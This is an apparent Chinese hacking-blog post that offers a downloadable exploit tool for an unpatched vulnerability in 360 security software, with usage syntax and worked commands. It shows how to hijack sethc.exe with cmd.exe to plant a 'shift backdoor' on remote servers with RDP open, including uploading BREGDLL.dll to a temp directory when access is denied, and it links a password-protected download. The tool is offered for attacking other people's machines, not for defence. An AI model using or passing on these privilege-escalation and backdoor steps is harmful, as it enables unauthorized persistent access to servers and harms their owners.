360漏洞利用工具

360暴的那个漏洞已经很长时间了,但据我所知很多服务器其实并没有补上这个漏洞。原因是多方面的,可能是防火墙或者是设置,反正最终导致的是360漏洞没有被补上,至少也是很多机子都没有补上。废话不说了,献上漏洞利用工具一个。

原理什么的就不多说了,网上太多太多了。

说下用法把

usage:

360.exe 要劫持的程序名 要运行的程序全路径 [BREGDLL.dll的全路径]

解释一下吧:第三个参数BREGDLL.dll是可选参数,提供BREGDLL.dll这个文件的路径。因为有时候虽然漏洞没有被补上但360目录没有权限访问会导致提权失败。这时候就可以上传一个BREGDLL.dll到服务器上,然后把路径填到第三个参数那里。

比如对方开了3389,那你就可以劫持sethc.exe 来做一个shift后门。

360.exe "sethc.exe" "cmd.exe"

如果360所在目录无权访问,那么我们就上传一个BREGDLL.dll到对方c:\windows\temp\BREGDLL.dll

然后执行

360.exe "sethc.exe" "cmd.exe" "c:\windows\temp\BREGDLL.dll"

如果提示成功一个shift后门就被创建了,3389上去我就不说了。

这两个文件我打包了一下

点击下载此文件

解压密码www.zeroplace.cn





有什么问题可以加群,100852896
点击这里加入此群 在线提问
文章来自: 本站原创
Tags:
评论: 1 | 查看次数: 15393
博主QQ: 友情链接请找我
QQ群: 灰色档案
返回顶部 关闭